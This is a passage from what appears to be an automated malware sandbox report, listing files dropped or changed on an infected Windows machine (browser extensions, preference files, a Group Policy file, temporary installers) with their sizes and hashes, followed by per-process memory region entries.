                                                                                                                  1f58f3e798a5f5693e1ac24addb2073a63d59b33f19b55bd73791b535a6b6ed2

                                                                                                                  SHA512

                                                                                                                  fea09686ba86f5f94c6a9273ebd8e950b9b14bf5b2c02c104d7da7c5ebb164be94ebf6024e8b0f7824b95739ec05a9669f444f942330dca14f1951b0c8445ebb

                                                                                                                • C:\Program Files (x86)\jxjAhybTjpHMhOlVVLR\YgbCBEg.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  dff6200ac8b5894e359f98399e4cdc27

                                                                                                                  SHA1

                                                                                                                  996ab764f079e4f088937c4a2d511a4fbbb319eb

                                                                                                                  SHA256

                                                                                                                  cf2beb29b64b77b70a85c512167e713d3b599d37415d28f2873f5fe898a8ba8d

                                                                                                                  SHA512

                                                                                                                  dbfe7226e840fb849028995795176e3c3a35bbf88a3024bac3b0299da97c929c37ac2a93029e771924074546b847752197f6d1674962859f0d6446fb2b72c857

                                                                                                                • C:\Program Files (x86)\ksrpDeExrbNyC\VgRzUSY.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  594337491b380d5fa17bf081e8db41ba

                                                                                                                  SHA1

                                                                                                                  253affa267c283e76afd43de04b17d55452d2f5d

                                                                                                                  SHA256

                                                                                                                  0d1c9df68690c567daca1021c7b39ea646e4e649446483f733e36d6b434741bf

                                                                                                                  SHA512

                                                                                                                  8ba3752baaf761a7c281bb790c0490f7631136a76567df2bbac5ae9bbc83866520b7642546e8c063155aa16280010a8d747d1c93d702f2398ae929cf515d7655

                                                                                                                • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                  Filesize

                                                                                                                  2.0MB

                                                                                                                  MD5

                                                                                                                  eee7818b16f349936b716d3284423249

                                                                                                                  SHA1

                                                                                                                  ca458920307103a07a289f3603ed58b1a544fb69

                                                                                                                  SHA256

                                                                                                                  f63b83e9a3ea35c0bf3947b451bd06fa58bd1c8efa0a6aeec991a7f7556d3ef6

                                                                                                                  SHA512

                                                                                                                  3542f6ddcccef6a3f6e964dca55a2fd6e6867c8463077d96cc4d536e7fd33b97a994901ea1252e963e1ebc76af7758d87a2a026462b938e15a0a9aa3eebb5eab

                                                                                                                • C:\ProgramData\VPXvovUKlRyvohVB\LyYlnvn.xml

                                                                                                                  Filesize

                                                                                                                  2KB

                                                                                                                  MD5

                                                                                                                  38521729462bb5045b9ce1ae31b5b585

                                                                                                                  SHA1

                                                                                                                  01c5e916f2f75395fafbd19df233276cdc7c738c

                                                                                                                  SHA256

                                                                                                                  f28f1c1c2d41deff13cbb8fe1dfa63c4f58013eab0470a82778ac43a8c87460d

                                                                                                                  SHA512

                                                                                                                  990e28cff094bbe90a0400103c25c7ad078c897a2d3418af0986b2b068bc4a6676e11ea71bfcfad18e262b849813deb657ef649e626ed2ef3b2af2c5626b4961

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                  Filesize

                                                                                                                  187B

                                                                                                                  MD5

                                                                                                                  2a1e12a4811892d95962998e184399d8

                                                                                                                  SHA1

                                                                                                                  55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                  SHA256

                                                                                                                  32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                  SHA512

                                                                                                                  bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                  Filesize

                                                                                                                  136B

                                                                                                                  MD5

                                                                                                                  238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                  SHA1

                                                                                                                  0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                  SHA256

                                                                                                                  801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                  SHA512

                                                                                                                  2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                  Filesize

                                                                                                                  150B

                                                                                                                  MD5

                                                                                                                  0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                  SHA1

                                                                                                                  6a51537cef82143d3d768759b21598542d683904

                                                                                                                  SHA256

                                                                                                                  0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                  SHA512

                                                                                                                  5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                  Filesize

                                                                                                                  10KB

                                                                                                                  MD5

                                                                                                                  1937ca77b94888e5e799265029b5fc33

                                                                                                                  SHA1

                                                                                                                  fb34cc7ac44cabc7ef0c362aa017038ac1fa48c8

                                                                                                                  SHA256

                                                                                                                  7070a49ac2d7d23d92e1a2bfcdc87daad53aa3f0bfb95b25e19f5c07129f0d22

                                                                                                                  SHA512

                                                                                                                  eb600474d91820f016835d2a3191fee3d23e320e4005334059f0bcb9d328b1443ac3669075561dcad4baab2313c932509d9aaf9b500c839902c987f1a8a3b54f

                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                  Filesize

                                                                                                                  26KB

                                                                                                                  MD5

                                                                                                                  dc2868ace49989c02e905bb8c9cf6cc9

                                                                                                                  SHA1

                                                                                                                  f1e4d3c59a98d42e28a43ac265cfd9e64d8aa79a

                                                                                                                  SHA256

                                                                                                                  7c8420c86cc63d9c6bd2f61a01bfdcdc9657734d7ef64dbc339a86d8dd3b41e2

                                                                                                                  SHA512

                                                                                                                  cbbcc10d7a10ac4f47ff0316fb661c9ca8e2c528ca5a1bc441c3516edc2f70d6f389715fc61dd638ee6d889f20556dc89d0a23c21fa6f73573227f16a86fc911

                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                  Filesize

                                                                                                                  7KB

                                                                                                                  MD5

                                                                                                                  676171b4725763197f2ac88d1b5d63fe

                                                                                                                  SHA1

                                                                                                                  27552a2b810e9e42022f11fd736f9bbee29ba69f

                                                                                                                  SHA256

                                                                                                                  f6ca9260696df81d15630b439aa38225e91b310df3217996e72af7aef2076c53

                                                                                                                  SHA512

                                                                                                                  a1c1a79e3bcf289a784e7571106760879d38a114949c847d2003357a2b6c68875623bedc82f63f28f5acbec687e3e59d756083d39ca4ad8d3e260057e3fe002c

                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                  Filesize

                                                                                                                  7KB

                                                                                                                  MD5

                                                                                                                  f8fa88be821bf57e140690d162c61a76

                                                                                                                  SHA1

                                                                                                                  15a079194ea62ac1d24b69e9b2f6ca3108fd6866

                                                                                                                  SHA256

                                                                                                                  86ca4a279dbcd5b116c63762b6c760937a4c0ecd47e16823f249120fc6ff5a4a

                                                                                                                  SHA512

                                                                                                                  a9c609ecbd885896b61b553721c15281374a30a447c504aa895c128212751fcdfabf2a3054e920f3a4611c0577d1ac288b6b8255d58a6c868ee820f1096b4723

                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                  Filesize

                                                                                                                  7KB

                                                                                                                  MD5

                                                                                                                  cb707197ea0cad7351fcc29411ca093f

                                                                                                                  SHA1

                                                                                                                  4d79acdda2afa86e303123e14898e3176af28007

                                                                                                                  SHA256

                                                                                                                  197d94c85175172bed6c7691594ee350f65dffe5cb01a73c2e9f1b7ddcbcd18d

                                                                                                                  SHA512

                                                                                                                  485a9f51c54fe3f0ce9544349eb5c3e2c0d129a04f40d16aef0f3b199d8918edfe17eb2b7463eb7253a7c950d7cd840e88c48731dc311e2e70b49d9a2a932e3a

                                                                                                                • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js

                                                                                                                  Filesize

                                                                                                                  7KB

                                                                                                                  MD5

                                                                                                                  8a8bb0a6b881832bfd4c1a4bb4c6091c

                                                                                                                  SHA1

                                                                                                                  2ba1fe887110fc32e2ccc27ab59173dfe9ef13e2

                                                                                                                  SHA256

                                                                                                                  2f3ef017f4dbc5fb9d5b2c5a62a9555e395caf589637f784358ff2ba148bb6a1

                                                                                                                  SHA512

                                                                                                                  c1bab74b13c15496398bd46a40975bd768fcb18ba435958726545bee89fb19a4789e8847ed1d05edff9a6e18374188bfae37fb5dd42cbbac1a2fd85fc9206b33

                                                                                                                • C:\Windows\Temp\GTQqDGwYWbPvVFKR\YekSuLKj\iESRuZL.dll

                                                                                                                  Filesize

                                                                                                                  6.5MB

                                                                                                                  MD5

                                                                                                                  efc86906236702bdb41d7861454ecb56

                                                                                                                  SHA1

                                                                                                                  94a05e7c15da2f282fe278634801fba6254a4247

                                                                                                                  SHA256

                                                                                                                  8665990cd3d840dc6206377e74a29fccc91e267275a0a9bed7c80937e7d5c09b

                                                                                                                  SHA512

                                                                                                                  e082978b7bb0104d916005d296980769187897e4b1fa446d97a17293a695699882fe3508a5cdc25e0d056a06a4d602548406d075591d5c1a7e86a891fe0d7680

                                                                                                                • C:\Windows\Temp\GTQqDGwYWbPvVFKR\vsWRKiAE\zAhsXGqXXoMSBRMG.wsf

                                                                                                                  Filesize

                                                                                                                  9KB

                                                                                                                  MD5

                                                                                                                  8c7b5254748ad7b620f55a23c4b7f5bd

                                                                                                                  SHA1

                                                                                                                  70b80f4d48a853a40730fb53ce322e6139bd475b

                                                                                                                  SHA256

                                                                                                                  fe3915d30dad94ae39891546e18de033cd3e109290a52dac367a2ffef3f83ad3

                                                                                                                  SHA512

                                                                                                                  abb86a148907652bda36999f9aa0b8061ab5e24d4ed1c279d3f9188d153013543fc11e93627b676d32231328f17b6d1f040451a5a566721447ac6f46d8f01aa2

                                                                                                                • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                  Filesize

                                                                                                                  5KB

                                                                                                                  MD5

                                                                                                                  e716d9dc69f2f320074ee4ea0b6e9550

                                                                                                                  SHA1

                                                                                                                  ecae26ff0b6ea02a022dd8b48f2ed0bb95537808

                                                                                                                  SHA256

                                                                                                                  20c5a5a64cba168e874a1ac91cf7a1ab3f9df87237ad1dd0e5f4062f7a00fbcc

                                                                                                                  SHA512

                                                                                                                  6d7e0ebb3cbdd51b24a2d5cbee89167bacbeca5af86ce98f35c45b59151f06aca1a71405ae19a488a1fba703ce2c180f834235057831ec6a18c4376faa85f2ec

                                                                                                                • \Users\Admin\AppData\Local\Temp\7zS823A.tmp\Install.exe

                                                                                                                  Filesize

                                                                                                                  6.4MB

                                                                                                                  MD5

                                                                                                                  8267e0404307c6a7e27e491836cbbf17

                                                                                                                  SHA1

                                                                                                                  f96d2655631bf4ada19462948275521b0b690d3b

                                                                                                                  SHA256

                                                                                                                  c08480e9b38217d439f0c78dd27eee079ffddb0dee57b06ea60e638299ff83c9

                                                                                                                  SHA512

                                                                                                                  5cfd3c8e536e0c7a606382707f67c09e80021e4d68880bf676140e22c7b54855bed50edbc15d76745b770afac2fc22df875e50e9c2f5f1cb5ce1a4cc50ca2c69

                                                                                                                • \Users\Admin\AppData\Local\Temp\7zS8739.tmp\Install.exe

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                  MD5

                                                                                                                  d7815c34ab9eeefcf11351ff24a3a6d3

                                                                                                                  SHA1

                                                                                                                  924dd43157f0e0d940b75dc10b7fee763350ba1d

                                                                                                                  SHA256

                                                                                                                  478c79d684943a92e6faaab102bbc55ae9919f66d1e952da660af8c412783aa0

                                                                                                                  SHA512

                                                                                                                  e59df4339b99ce4f892b8165d0d353f183ca299e38faf69c20ba5764d567fae3ee6547af47301a85afe5f53d9e866daac5bce6774fb4f7e43e14252d94e017f2

                                                                                                                • memory/772-84-0x00000000010D0000-0x000000000178F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/772-98-0x0000000001F20000-0x0000000001FA5000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  532KB

                                                                                                                • memory/772-132-0x0000000001880000-0x00000000018E7000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  412KB

                                                                                                                • memory/772-360-0x00000000010D0000-0x000000000178F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/772-332-0x0000000002970000-0x0000000002A4A000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  872KB

                                                                                                                • memory/772-315-0x0000000002670000-0x00000000026FC000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  560KB

                                                                                                                • memory/772-88-0x0000000010000000-0x0000000011E6C000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  30.4MB

                                                                                                                • memory/1072-42-0x0000000000990000-0x000000000104F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/1072-85-0x0000000000990000-0x000000000104F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/1072-65-0x0000000000990000-0x000000000104F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/1072-44-0x0000000010000000-0x0000000011E6C000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  30.4MB

                                                                                                                • memory/1516-23-0x0000000001590000-0x0000000001C4F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/1516-39-0x0000000000AE0000-0x000000000119F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/1516-38-0x0000000001590000-0x0000000001C4F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/1516-28-0x0000000010000000-0x0000000011E6C000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  30.4MB

                                                                                                                • memory/1516-24-0x0000000000AE0000-0x000000000119F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/2020-329-0x00000000015B0000-0x000000000341C000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  30.4MB

                                                                                                                • memory/2044-18-0x0000000002660000-0x0000000002D1F000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  6.7MB

                                                                                                                • memory/2220-63-0x000000001B760000-0x000000001BA42000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  2.9MB

                                                                                                                • memory/2220-64-0x0000000001F70000-0x0000000001F78000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  32KB

                                                                                                                • memory/3032-53-0x000000001B590000-0x000000001B872000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  2.9MB

                                                                                                                • memory/3032-54-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

                                                                                                                  Filesize

                                                                                                                  32KB